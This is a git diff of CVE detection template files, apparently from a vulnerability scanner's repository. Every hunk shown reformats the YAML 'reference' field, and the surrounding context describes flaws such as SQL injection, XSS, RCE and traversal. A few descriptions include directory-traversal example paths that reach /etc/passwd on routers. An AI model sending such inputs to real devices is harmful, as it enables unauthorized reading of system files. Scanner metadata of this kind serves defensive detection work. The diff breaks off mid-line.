ef5ab6ed1e..cff4fd841a 100644 --- a/cves/2020/CVE-2020-4463.yaml +++ b/cves/2020/CVE-2020-4463.yaml @@ -10,7 +10,7 @@ info: A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. - reference: | + reference: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 tags: cve,cve2020,ibm,xxe diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 55fcfc1b84..175c159ba9 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -4,7 +4,7 @@ info: name: Dairy Farm Shop Management System - SQL Injection author: gy741 description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. - reference: | + reference: - https://cinzinga.com/CVE-2020-5307-5308/ severity: critical tags: cve,cve2020,sqli diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index cfc759516e..54c13f3586 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -5,7 +5,7 @@ info: author: madrobot,dwisiswant0,ringo severity: high description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. - reference: | + reference: - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html - http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index e552deef58..0a0e1ce779 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -6,7 +6,7 @@ info: severity: critical tags: cve,cve2020,rce,liferay description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). - reference: | + reference: - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml index a489c499a7..f12449e30e 100644 --- a/cves/2020/CVE-2020-8115.yaml +++ b/cves/2020/CVE-2020-8115.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim. - reference: | + reference: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ tags: cve,cve2020,xss diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml index f7b28604d5..d63d614467 100644 --- a/cves/2020/CVE-2020-8512.yaml +++ b/cves/2020/CVE-2020-8512.yaml @@ -5,7 +5,7 @@ info: author: pdteam,dwisiswant0 severity: medium description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/47988 - https://twitter.com/sagaryadav8742/status/1275170967527006208 tags: cve,cve2020,xss diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index 21148d4956..0b7f3c8ed7 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. - reference: | + reference: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ tags: cve,cve2020,rce diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 586fc0dfb9..e5a9eb428d 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability - reference: | + reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml index 30caec3bae..1f7d2d46bb 100644 --- a/cves/2020/CVE-2020-9036.yaml +++ b/cves/2020/CVE-2020-9036.yaml @@ -4,7 +4,7 @@ info: name: Jeedom through 4.0.38 allows XSS author: pikpikcu severity: medium - reference: | + reference: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml index 9a514eb66f..b7e04c9990 100644 --- a/cves/2020/CVE-2020-9047.yaml +++ b/cves/2020/CVE-2020-9047.yaml @@ -16,7 +16,7 @@ info: download and run a malicious executable that could allow OS command injection on the system. - reference: | + reference: - https://github.com/norrismw/CVE-2020-9047 - https://www.johnsoncontrols.com/cyber-solutions/security-advisories - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01 diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index 34d1904962..ff2a299a2b 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml @@ -15,7 +15,7 @@ info: However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2 - reference: | + reference: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml tags: cve,cve2020,rce diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml index 1d5e78f380..c36d080c80 100644 --- a/cves/2020/CVE-2020-9344.yaml +++ b/cves/2020/CVE-2020-9344.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations. tags: cve,cve2020,atlassian,jira,xss - reference: | + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344 - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index fce8b70603..3e012c49bd 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml @@ -3,7 +3,7 @@ id: CVE-2020-9402 info: name: Django SQL Injection description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL. - reference: | + reference: - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 - https://docs.djangoproject.com/en/3.0/releases/security/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index 9daed3727e..a03934277c 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml @@ -4,7 +4,7 @@ info: author: madrobot severity: high description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response. - reference: | + reference: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 tags: cve,cve2020,rconfig diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index b0ccf8e655..29298339ca 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -6,7 +6,7 @@ info: description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. author: philippedelteil tags: cve,cve2020,apache,dos - reference: | + reference: - https://httpd.apache.org/security/vulnerabilities_24.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 905a7a7455..217ef7fa40 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -5,7 +5,7 @@ info: description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 severity: critical - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-1497 - https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497 - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index e815a8471b..216727adc8 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: critical description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. - reference: | + reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index bda757469c..13d9c5e2c7 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected. - reference: | + reference: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - https://security.netapp.com/advisory/ntap-20210312-0007/ tags: nodejs,cve,cve2021 diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index a2d992ffd9..02b322629c 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -5,7 +5,7 @@ info: author: lotusdll severity: critical description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE - reference: | + reference: - https://github.com/HoangKien1020/CVE-2021-21389 - https://nvd.nist.gov/vuln/detail/CVE-2021-21389 tags: cve,cve2021,wordpress,wp-plugin,rce diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index 5271910e78..aa4c7001a1 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 213b811b3d..2738c6092d 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -4,11 +4,12 @@ info: name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS author: dwisiswant0 severity: medium - description: An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated, remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points. - reference: | + description: | + An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated, + remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points. + reference: - https://www.fortiguard.com/psirt/FG-IR-20-122 - https://twitter.com/ptswarm/status/1357316793753362433 - tags: cve,cve2021,fortiweb,xss # FortiWeb GUI interface may allow an unauthenticated, remote attacker diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index 9fec2f32b0..ffaac3c2bc 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -5,7 +5,7 @@ info: name: Unauthenticated Gitlab SSRF - CI Lint API severity: medium description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index 8a834ac8d2..67b62f066e 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. - reference: | + reference: - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 tags: cve,cve2021,iot,lfi,router diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index 07ad8546f2..8b18bc6ce9 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -5,7 +5,7 @@ info: author: Ganofins severity: medium description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. - reference: | + reference: - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml index 845fffe640..6a8ba89710 100644 --- a/cves/2021/CVE-2021-24237.yaml +++ b/cves/2021/CVE-2021-24237.yaml @@ -6,7 +6,7 @@ info: description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. severity: medium tags: cve,cve2021,realteo,xss,wordpress - reference: | + reference: - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 14a1453f5d..9d7f344e7d 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -6,7 +6,7 @@ info: severity: critical description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue. tags: cve,cve2021,wordpress,wp-plugin,sqli - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml index 00b724d223..036761fd15 100644 --- a/cves/2021/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml @@ -6,7 +6,7 @@ info: name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress severity: medium tags: cve,cve2021,mediumish,xss,wordpress - reference: | + reference: - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml index 0f6578244b..a20c217e53 100644 --- a/cves/2021/CVE-2021-24340.yaml +++ b/cves/2021/CVE-2021-24340.yaml @@ -5,7 +5,7 @@ info: author: lotusdll severity: critical description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. - reference: | + reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 35d8f8ffab..4fae911bf5 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -5,7 +5,7 @@ info: author: johnjhacking severity: medium tags: cve,cve2021,wp-plugin,wordpress,xss - reference: | + reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index dfc0d7f0c7..1d812c55c6 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -5,7 +5,7 @@ info: severity: critical tags: apache,cve,cve2021,rce,ofbiz description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. - reference: | + reference: - https://github.com/yumusb/CVE-2021-26295-POC - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml index a84f46e2cc..7358094f07 100644 --- a/cves/2021/CVE-2021-26723.yaml +++ b/cves/2021/CVE-2021-26723.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS. - reference: | + reference: - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205 - https://jenzabar.com/blog diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index c6316beaa3..ae38d892b3 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -6,7 +6,7 @@ info: description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application. severity: medium tags: cve,cve2021,moodle,jitsi,xss - reference: | + reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index f5df4f2484..66650bcc75 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -7,7 +7,7 @@ info: description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. tags: cve,cve2021,ssrf,rce,exchange - reference: | + reference: - https://proxylogon.com/#timeline - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml index dfd14878a0..e3038cb194 100644 --- a/cves/2021/CVE-2021-27651.yaml +++ b/cves/2021/CVE-2021-27651.yaml @@ -4,7 +4,7 @@ info: name: Pega Infinity Authentication bypass author: idealphase description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks. - reference: | + reference: - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 severity: critical diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index 22a15c83a9..d1f3b5f64f 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -6,7 +6,7 @@ info: A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. author: pdteam severity: critical - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 tags: cve,cve2021,apache,tapestry diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index 5b4805182a..80bd8c5a90 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -6,7 +6,7 @@ info: severity: medium tags: cve,cve2021,apache,solr,ssrf description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. - reference: | + reference: - https://www.anquanke.com/post/id/238201 - https://ubuntu.com/security/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 diff --git a/cves/2021/CVE-2021-28073.yaml b/cves/2021/CVE-2021-28073.yaml index 534e9f8735..aa5d34e1b3 100644 --- a/cves/2021/CVE-2021-28073.yaml +++ b/cves/2021/CVE-2021-28073.yaml @@ -6,7 +6,7 @@ info: severity: critical description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2 tags: ntopng,cve,cve2021 - reference: | + reference: - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index e9f4040fdd..53d98b7bfd 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. - reference: | + reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 tags: cve,cve2021,hongdian,traversal diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index f1dade1c72..cc21b4ced3 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. - reference: | + reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 tags: cve,cve2021,hongdian,exposure diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 82529e9e51..0fd026b156 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -6,7 +6,7 @@ info: severity: high description: | Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. - reference: | + reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 tags: cve,cve2021,hongdian,rce diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 859333bacb..40408c866b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. - reference: | + reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index 00d2820a84..e88a103bc6 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -4,7 +4,7 @@ info: name: Jetty Utility Servlets Information Disclosure author: pikpikcu severity: medium - reference: | + reference: - https://twitter.com/sec715/status/1406787963569065988 - https://nvd.nist.gov/vuln/detail/CVE-2021-28169 description: | diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 92cbe77690..00d1cd8215 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -4,7 +4,7 @@ info: author: madrobot severity: critical tags: hpe,cve,cve2021,bypass - reference: | + reference: - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 diff --git 